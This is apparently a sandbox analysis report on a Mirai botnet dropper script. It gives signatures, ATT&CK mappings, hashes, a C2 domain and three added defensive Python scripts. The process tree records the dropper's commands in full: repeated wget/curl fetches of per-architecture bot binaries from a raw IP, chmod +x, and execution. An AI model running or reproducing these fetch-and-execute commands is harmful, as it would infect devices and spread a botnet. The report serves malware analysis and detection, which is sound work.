Analysis (behavioral2 run shown on this page)
  max time kernel:   131s
  max time network:  150s
  platform:          debian-9_armhf
  resource:          debian9-armhf-20240729-en
  resource tags:     arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  submitted:         19-12-2024 07:12
Tasks
  static1      Static task
  behavioral1  Sample feelme420.sh, resource ubuntu1804-amd64-20240611-en
  behavioral2  Sample feelme420.sh, resource debian9-armhf-20240729-en (the run reported below)
  behavioral3  Sample feelme420.sh, resource debian9-mipsbe-20240611-en
  behavioral4  Sample feelme420.sh, resource debian9-mipsel-20240418-en
General
  Target:  feelme420.sh
  Size:    3KB
  MD5:     22e9d65b991f00de3a52071664dc52f9
  SHA1:    2b6dd972572c4c72ecf43bb7b66eebe776cd0360
  SHA256:  7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
  SHA512:  eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb
Malware Config
  Extracted (two instances)
    family:  mirai
    C2:      chernobyl.stressing.world
Signatures

Mirai family

Contacts a large number (15832) of remote hosts  (1 TTP)
  This may indicate a network scan to discover remotely running services.

Creates a large number of network flows  (1 TTP)
  This may indicate a network scan to discover remotely running services.

File and Directory Permissions Modification  (1 TTP, 16 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Process chmod, PIDs: 672, 682, 693, 707, 722, 742, 756, 766, 806, 816, 828, 844, 854, 866, 876, 888
  (one chmod +x per fetched payload; the full argument lists are in the process tree)
Executes dropped EXE  (16 IoCs)
  IoC /tmp/f331m3420, process f331m3420
  PIDs: 674, 683, 695, 708, 724, 743, 757, 767, 807, 817, 829, 845, 855, 867, 877, 889
Modifies Watchdog functionality  (1 TTP, 20 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  Process f331m3420 opened for modification:
    /dev/watchdog        10 times
    /dev/misc/watchdog   10 times
  The 20 opens are spread across the ten f331m3420 runs tagged in the process tree (PID 757 onward). In the leaked Mirai source the bot opens the watchdog node for writing and issues the WDIOC_SETOPTIONS ioctl with WDIOS_DISABLECARD, so that a hung or killed bot does not trip the hardware reset; the open-for-write is what the sandbox records here. On a real device a legitimate watchdog daemon (or systemd with RuntimeWatchdogSec set) also holds this node, so the useful question is which process owns the descriptor.
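A host-side check for the behaviour this signature describes, as an added example (mine, not sandbox output or the sample's code): it walks /proc/<pid>/fd and reports every process whose descriptor links to a watchdog node, then separates out holders that are not an expected watchdog daemon. The proc_root parameter lets the same scan run against a constructed procfs tree (build_fake_proc) for offline use; the expected-owner list and the extra /dev/watchdog0 node are assumptions to adjust per host.

```python
"""Find the processes holding a watchdog device node open.

Added example for this report; it is not sandbox output or the sample's code. The
signature above records f331m3420 opening /dev/watchdog and /dev/misc/watchdog for
writing; on a live host the same act leaves a file descriptor in /proc/<pid>/fd that
links to one of those paths. proc_root is a parameter so the scan can be run against
a reconstructed procfs tree (build_fake_proc, constructed for offline use) as well as
the real /proc; the expected-owner list is an assumption to adjust per host.
"""
import os
import tempfile

WATCHDOG_NODES = ("/dev/watchdog", "/dev/watchdog0", "/dev/misc/watchdog")
# Daemons that legitimately own the device on most distributions (assumed list).
EXPECTED_OWNERS = frozenset({"watchdog", "watchdogd", "systemd"})


def _comm(proc_root, pid):
    """Command name from /proc/<pid>/comm, '?' if it cannot be read."""
    try:
        with open(os.path.join(proc_root, pid, "comm")) as fh:
            return fh.read().strip()
    except OSError:
        return "?"


def watchdog_holders(proc_root="/proc", nodes=WATCHDOG_NODES):
    """Return sorted [(pid, comm, fd, node)] for each fd that links to a watchdog node.

    Needs root to see other users' fd tables on a real host; unreadable entries are
    skipped rather than aborting the scan.
    """
    hits = []
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:                    # exited, or not permitted
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if target in nodes:
                hits.append((int(pid), _comm(proc_root, pid), int(fd), target))
    return sorted(hits)


def suspicious_holders(proc_root="/proc", expected=EXPECTED_OWNERS):
    """Holders whose command name is not one of the expected watchdog daemons."""
    return [h for h in watchdog_holders(proc_root) if h[1] not in expected]


def build_fake_proc(root=None):
    """Constructed procfs layout for offline use: an expected holder, a holder named
    like the bot in this report, and a pid directory with no readable fd table."""
    root = root or tempfile.mkdtemp(prefix="fakeproc-")
    for pid, comm, fd, node in ((412, "watchdogd", 3, "/dev/watchdog"),
                                (889, "f331m3420", 4, "/dev/misc/watchdog")):
        d = os.path.join(root, str(pid))
        os.makedirs(os.path.join(d, "fd"))
        with open(os.path.join(d, "comm"), "w") as fh:
            fh.write(comm + "\n")
        os.symlink(node, os.path.join(d, "fd", str(fd)))
    os.makedirs(os.path.join(root, "1"))   # no fd directory at all
    return root


if __name__ == "__main__":
    for pid, comm, fd, node in suspicious_holders():
        print(f"pid {pid} ({comm}) holds {node} open on fd {fd}")
```

Run it as root on the suspect host; a holder with a random-looking command name (the bot renames itself, see "Changes its process name" below) is the thing to look at. Note that closing the descriptor from outside does not undo the disable ioctl the bot already issued.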
Enumerates active TCP sockets  (1 TTP, 9 IoCs)
  Gets active TCP sockets from /proc virtual filesystem.
  Process f331m3420 opened /proc/net/tcp for reading 9 times.
Enumerates running processes
  Discovers information about currently running processes on the system.
Writes file to system bin folder  (20 IoCs)
  Process f331m3420 opened for modification:
    /bin/watchdog    10 times
    /sbin/watchdog   10 times
  These are open-for-write events, not confirmed writes, and they pair one-to-one with the watchdog device opens above: Mirai derivatives commonly walk a list of watchdog paths that includes /sbin/watchdog and /bin/watchdog as well as the device nodes, issuing the disable ioctl on whatever opens. Read this as the same watchdog-tampering attempt, not as a binary dropped into /bin or /sbin; the page shows no file content written there.
Reads process memory  (1 TTP, 34 IoCs)
  Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
  Process f331m3420 opened /proc/<pid>/maps for reading, for pid in:
    578, 579, 582, 583, 598, 642, 643, 644, 647, 830, 891, 893, 894, 896, 901, 907, 912, 918, 924, 927, 933, 938, 940, 946, 952, 958, 963, 965, 971, 977, 983, 988, 990, 996
  The credential-theft sentence is the signature's generic text. Sweeping every PID's maps right after start-up fits Mirai's killer routine, which inspects other processes to find and kill competing bots; nothing on this page indicates credential access.
Changes its process name  (10 IoCs)
  Changes the process name, possibly in an attempt to hide itself.
  Process f331m3420, IoC column as recorded: a
  PIDs: 757, 767, 807, 817, 829, 845, 855, 867, 877, 889
Checks CPU configuration  (1 TTP, 16 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  Process curl opened /proc/cpuinfo for reading 16 times (once per curl invocation).
  Caveat: every one of these reads is attributed to curl, not to the dropper or the bot. Reading /proc/cpuinfo at start-up (together with /proc/self/auxv and /proc/sys/crypto/fips_enabled, listed under "Reads runtime system information" below) is ordinary run-time probing by curl and the libraries it links on ARM, so this is not sandbox evasion by the sample. The Virtualization/Sandbox Evasion entry in the ATT&CK mapping below inherits this false positive.
Reads system network configuration  (1 TTP, 9 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  Process f331m3420 opened /proc/net/tcp for reading 9 times (the same nine reads reported above as "Enumerates active TCP sockets").
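What the bot gets from those nine reads, and what an analyst can read back, as an added example (mine; not sandbox output and not the sample's code): a parser for the kernel's /proc/net/tcp layout that lists LISTEN sockets and picks out the ones a Mirai-style killer goes after. The leaked Mirai source's killer thread reads this file to find the socket bound to port 23 (and, in some builds, 22 and 80), maps its inode to a PID through /proc/<pid>/fd, kills that process and binds the port itself. SAMPLE is constructed in the kernel's format, not captured from this run; the port list is the one from the public source.

```python
"""Parse /proc/net/tcp: what the Mirai killer reads, and what an analyst reads back.

Added example for this report; it is neither sandbox output nor the sample's code.
SAMPLE below is constructed in the kernel's exact layout, not captured from the run.
"""
import socket
import struct

TCP_ESTABLISHED = 0x01
TCP_LISTEN = 0x0A

# Constructed sample: a telnet listener owned by root, a localhost listener on 8080
# owned by uid 1000, and an established connection to the download host on port 80.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0017 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 23456 1 0000000000000000 100 0 0 10 0
   2: 0E01A8C0:B75A BCA7175E:0050 01 00000000:00000000 00:00000000 00000000  1000        0 34567 1 0000000000000000 20 4 30 10 -1
"""


def parse_addr(field, little_endian=True):
    """'0100007F:1F90' -> ('127.0.0.1', 8080).

    The kernel prints the IPv4 address as one 32-bit word in host byte order, so on
    x86, armhf and mipsel the octets appear reversed; for a big-endian host such as
    the debian9-mipsbe task in this report pass little_endian=False.
    """
    addr_hex, port_hex = field.split(":")
    fmt = "<I" if little_endian else ">I"
    return socket.inet_ntoa(struct.pack(fmt, int(addr_hex, 16))), int(port_hex, 16)


def parse_proc_net_tcp(text, little_endian=True):
    """One dict per socket line: local/remote endpoints, state, uid, inode."""
    rows = []
    for line in text.splitlines()[1:]:          # first line is the column header
        f = line.split()
        if len(f) < 10:
            continue
        rows.append({
            "local": parse_addr(f[1], little_endian),
            "remote": parse_addr(f[2], little_endian),
            "state": int(f[3], 16),
            "uid": int(f[7]),
            "inode": int(f[9]),
        })
    return rows


def listening_ports(text, little_endian=True):
    """(port, bind_ip, uid, inode) for every LISTEN socket, sorted by port."""
    return sorted((r["local"][1], r["local"][0], r["uid"], r["inode"])
                  for r in parse_proc_net_tcp(text, little_endian)
                  if r["state"] == TCP_LISTEN)


def killer_targets(text, ports=(23, 22, 80), little_endian=True):
    """port -> socket inode for the listeners a Mirai-style killer goes after.

    The bot's next step (not shown here) is to find which /proc/<pid>/fd entry links
    to 'socket:[<inode>]', SIGKILL that pid, and bind the port itself.
    """
    return {port: inode
            for port, _ip, _uid, inode in listening_ports(text, little_endian)
            if port in ports}


if __name__ == "__main__":
    with open("/proc/net/tcp") as fh:
        for port, ip, uid, inode in listening_ports(fh.read()):
            print(f"{ip}:{port}  uid={uid}  inode={inode}")
```

Reading the file is not privileged, which is why the bot can do it as any user; the inode-to-PID step afterwards is what needs access to other processes' fd tables. On a box under investigation, a telnet listener that has vanished while an unknown process now holds port 23 is the killer's footprint.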
Reads runtime system information  (57 IoCs)
  Process curl opened for reading:
    /proc/self/auxv                 16 times
    /proc/sys/crypto/fips_enabled   16 times
  (once per curl invocation; library start-up on ARM, see the caveat under "Checks CPU configuration")
  Process f331m3420 opened /proc/<pid>/maps for reading, for pid in:
    1002, 1008, 1013, 1015, 1021, 1027, 1033, 1038, 1040, 1046, 1052, 1058, 1063, 1065, 1071, 1077, 1083, 1088, 1090, 1096, 1102, 1108, 1113, 1115, 1121
  (a further 25 PIDs beyond the 34 under "Reads process memory"; this is the last f331m3420 run, PID 889, sweeping processes started later in the session)
System Network Configuration Discovery  (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  PIDs: 677 wget, 680 curl, 681 cat
Writes file to tmp directory  (31 IoCs)
  Malware often drops required files in the /tmp directory.
  /tmp/f331m3420           feelme420.sh
  /tmp/feelme420.<arch>    curl and wget, for arch in: arc, arm5, arm6, arm7, i486, i686, m68k, mips, mpsl, ppc, sh4, spc, x86, x86_64
  /tmp/feelme420.arm       curl only
  /tmp/feelme420.i586      curl only
  This is the usual download-per-architecture dropper: the same payload name with a per-CPU suffix is fetched with both wget and curl for every architecture (so the script works with either tool present), copied to one fixed name, and executed; the sequence is visible in the process tree.
Processes  (indentation = depth in the tree; tags in braces are the sandbox's signature hits for that process)

PID 645  /tmp/feelme420.sh: /tmp/feelme420.sh  {Writes file to tmp directory}
  PID 648  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.x86  {Writes file to tmp directory}
  PID 662  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.x86  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 671  /bin/cat: cat feelme420.x86
  PID 672  /bin/chmod: chmod +x f331m3420 feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 674  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE}
  PID 677  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.mips  {System Network Configuration Discovery; Writes file to tmp directory}
  PID 680  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.mips  {Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory}
  PID 681  /bin/cat: cat feelme420.mips  {System Network Configuration Discovery}
  PID 682  /bin/chmod: chmod +x f331m3420 feelme420.mips feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 683  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE}
  PID 685  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.mpsl  {Writes file to tmp directory}
  PID 686  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.mpsl  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 692  /bin/cat: cat feelme420.mpsl
  PID 693  /bin/chmod: chmod +x f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 695  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE}
  PID 697  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.arm
  PID 701  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.arm  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 705  /bin/cat: cat feelme420.arm
  PID 707  /bin/chmod: chmod +x f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 708  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE}
  PID 710  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.arm5  {Writes file to tmp directory}
  PID 715  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.arm5  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 721  /bin/cat: cat feelme420.arm5
  PID 722  /bin/chmod: chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 724  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE}
  PID 725  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.arm6  {Writes file to tmp directory}
  PID 731  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.arm6  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 741  /bin/cat: cat feelme420.arm6
  PID 742  /bin/chmod: chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 743  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE}
  PID 745  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.arm7  {Writes file to tmp directory}
  PID 751  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.arm7  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 755  /bin/cat: cat feelme420.arm7
  PID 756  /bin/chmod: chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 757  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Changes its process name}
  PID 760  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.ppc  {Writes file to tmp directory}
  PID 764  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.ppc  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 766  /bin/chmod: chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 767  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration}
  PID 800  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.m68k  {Writes file to tmp directory}
  PID 804  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.m68k  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 806  /bin/chmod: chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 807  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration}
  PID 810  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.sh4  {Writes file to tmp directory}
  PID 814  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.sh4  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 816  /bin/chmod: chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 817  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration}
  PID 822  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.spc  {Writes file to tmp directory}
  PID 826  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.spc  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 828  /bin/chmod: chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 systemd-private-5e13b6130fb642819963a0060f9a10ab-systemd-timedated.service-NLgOHv  {File and Directory Permissions Modification}
  PID 829  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration}
  PID 838  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.arc  {Writes file to tmp directory}
  PID 842  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.arc  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 844  /bin/chmod: chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86  {File and Directory Permissions Modification}
  PID 845  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration}
  PID 848  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.x86_64  {Writes file to tmp directory}
  PID 852  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.x86_64  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 854  /bin/chmod: chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64  {File and Directory Permissions Modification}
  PID 855  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration}
  PID 860  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.i686  {Writes file to tmp directory}
  PID 864  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.i686  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 866  /bin/chmod: chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64  {File and Directory Permissions Modification}
  PID 867  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration}
  PID 870  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.i486  {Writes file to tmp directory}
  PID 874  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.i486  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 876  /bin/chmod: chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64  {File and Directory Permissions Modification}
  PID 877  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Changes its process name; Reads system network configuration}
  PID 882  /usr/bin/wget: wget http://94.23.167.188/F331M3/feelme420.i586
  PID 886  /usr/bin/curl: curl -O http://94.23.167.188/F331M3/feelme420.i586  {Checks CPU configuration; Reads runtime system information; Writes file to tmp directory}
  PID 888  /bin/chmod: chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64  {File and Directory Permissions Modification}
  PID 889  /tmp/f331m3420: ./f331m3420 feelme420.exploit  {Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Writes file to system bin folder; Reads process memory; Changes its process name; Reads system network configuration; Reads runtime system information}

Reading the tree (the script body itself is not on this page, so the following are inferences from the recorded commands):
  - Each round is the same four steps: fetch the per-architecture payload with wget and then curl, copy it to /tmp/f331m3420 (the cat child, with the shell doing the redirect), chmod +x, run ./f331m3420 feelme420.exploit.
  - The chmod argument list tracks the contents of /tmp exactly, including the sandbox's own systemd-private-*-timedated directory until it is cleaned up around PID 844. That is consistent with the script running chmod +x * in /tmp rather than naming its files.
  - A cat child appears only for the first seven payloads (x86 through arm7). From ppc onward the fixed name is not restaged, and every one of those later runs shows the same watchdog, /proc/net/tcp and process-rename behaviour as the arm7 run (PID 757). The simplest reading is that /tmp/f331m3420 still held the arm7 build, which is the one that actually runs on this armhf sandbox; the x86, MIPS and earlier ARM rounds show nothing beyond the execute event.
  - The single download host 94.23.167.188 (path /F331M3/) and the fixed staging name /tmp/f331m3420 are the blockable indicators from this tree; the C2 domain comes from the extracted config above.
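Pulling those rounds and indicators out of a process tree mechanically, as an added example (mine; not the sandbox's output format and not the sample's code). TREE is a constructed, abbreviated copy of the tree above (the first three of the sixteen rounds, PIDs as reported) normalised to "PID  command line" lines; that normalisation and the rule for where a round starts and ends are my assumptions, not something the sandbox defines.

```python
"""Reconstruct the dropper's fetch/stage/run rounds from the sandbox process tree.

Added example for this report; it is neither sandbox output nor the sample's code.
TREE is a constructed, abbreviated copy of the tree above (three of sixteen rounds,
PIDs as reported) normalised to "PID  command line" lines; the normalisation and the
round-splitting rule are assumptions of this example, not a sandbox format.
"""
import re
from urllib.parse import urlsplit

TREE = """\
645  /tmp/feelme420.sh
648  wget http://94.23.167.188/F331M3/feelme420.x86
662  curl -O http://94.23.167.188/F331M3/feelme420.x86
671  cat feelme420.x86
672  chmod +x f331m3420 feelme420.sh feelme420.x86
674  ./f331m3420 feelme420.exploit
677  wget http://94.23.167.188/F331M3/feelme420.mips
680  curl -O http://94.23.167.188/F331M3/feelme420.mips
681  cat feelme420.mips
682  chmod +x f331m3420 feelme420.mips feelme420.sh feelme420.x86
683  ./f331m3420 feelme420.exploit
685  wget http://94.23.167.188/F331M3/feelme420.mpsl
686  curl -O http://94.23.167.188/F331M3/feelme420.mpsl
692  cat feelme420.mpsl
693  chmod +x f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86
695  ./f331m3420 feelme420.exploit
"""

LINE = re.compile(r"^(\d+)\s+(.+)$")
URL = re.compile(r"https?://\S+")


def parse_tree(text):
    """[(pid, argv)] for every 'PID  command' line."""
    out = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            out.append((int(m.group(1)), m.group(2).split()))
    return out


def rounds(text):
    """Split the tree into rounds, one per payload URL.

    A round opens at the first wget/curl for a URL and closes when the staged
    binary is executed (argv[0] starting with './'); cat and chmod in between are
    the staging steps. Rounds without a cat (ppc onward in the full tree) are kept
    with cat_pid left as None, which is how the restaging gap shows up.
    """
    done, cur = [], None
    for pid, argv in parse_tree(text):
        cmd = argv[0]
        if cmd in ("wget", "curl"):
            m = URL.search(" ".join(argv))
            if not m:
                continue
            url = m.group(0)
            if cur is None or cur["url"] != url:
                if cur is not None:
                    done.append(cur)
                cur = {"url": url, "arch": url.rsplit(".", 1)[-1], "fetch_pids": [],
                       "cat_pid": None, "chmod_pid": None, "run_pid": None, "run_argv": None}
            cur["fetch_pids"].append(pid)
        elif cur is None:
            continue                      # the parent shell itself
        elif cmd == "cat":
            cur["cat_pid"] = pid
        elif cmd == "chmod":
            cur["chmod_pid"] = pid
        elif cmd.startswith("./"):
            cur["run_pid"], cur["run_argv"] = pid, argv
            done.append(cur)
            cur = None
    if cur is not None:
        done.append(cur)
    return done


def iocs(text):
    """The indicators worth blocking or hunting for, pulled out of the rounds."""
    rs = rounds(text)
    return {
        "download_hosts": sorted({urlsplit(r["url"]).hostname for r in rs}),
        "urls": [r["url"] for r in rs],
        "archs": [r["arch"] for r in rs],
        "staged_binary": sorted({r["run_argv"][0] for r in rs if r["run_argv"]}),
        "run_args": sorted({a for r in rs if r["run_argv"] for a in r["run_argv"][1:]}),
        "restaged": [r["arch"] for r in rs if r["cat_pid"] is not None],
    }


if __name__ == "__main__":
    for key, value in iocs(TREE).items():
        print(f"{key}: {value}")
```

Feeding the full 72-line tree through rounds() is the quickest way to confirm the restaging gap noted above: the rounds from ppc onward come back with cat_pid None while their run_pid is still set.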
MITRE ATT&CK Enterprise v15
  Defense Evasion
    File and Directory Permissions Modification (T1222): 1
      Linux and Mac File and Directory Permissions Modification (T1222.002): 1
    Impair Defenses (T1562): 1
    Virtualization/Sandbox Evasion (T1497): 1
      System Checks (T1497.001): 1
Downloads

  1. Filesize 68KB
     MD5     71b0c2e7cc122d6de4a481bea5ebc6d9
     SHA1    f982ae244188ddd93b797e9548e049b97d2f2c7f
     SHA256  de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833
     SHA512  f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43

  2. Filesize 114KB
     MD5     e10ad3d97637588b2056db57a546fa7f
     SHA1    138efa03e54a9f1eaed0e587ea259c182a1289d1
     SHA256  1ea71a6d347541c7f892d7361fbda4b282fcf5d11aeb7297a8345ce88f78865a
     SHA512  c6a9455aa701260796fa9f9b466dccf1166bb11cf3c0d9896f43ea9936f695ace78863f230362b884249bc3a110a3e1f4ad659ea5e9163261fb0bc1c349dd71a

  3. Filesize 114KB
     MD5     c5d1f6a6e591069acffcaeb19c405a02
     SHA1    1265bbf1ff14c6b913ced2f63807aaa93137d87b
     SHA256  6e4e8f08dd7471f62194314808a2d1a19b53db947c707a8839ce56c453656049
     SHA512  64d63427c40954e8b6c56b2bf56533ed3b06bc347b7add89e15e59fa7ca62ae744ec398384487621b5ace6dd6a6fcb9fe71cdabbcd5ef7379441d9ec779ac5ae

  4. Filesize 218B
     MD5     9efd7ff37a85d83af5298b3671491070
     SHA1    24c2fbed0abb244b610f6aa0a429c50902d7a682
     SHA256  a90c0ae7235ef04a7df3797ab4f15c35e1d5f04fafbf06d81df3e6ce82e7a7b4
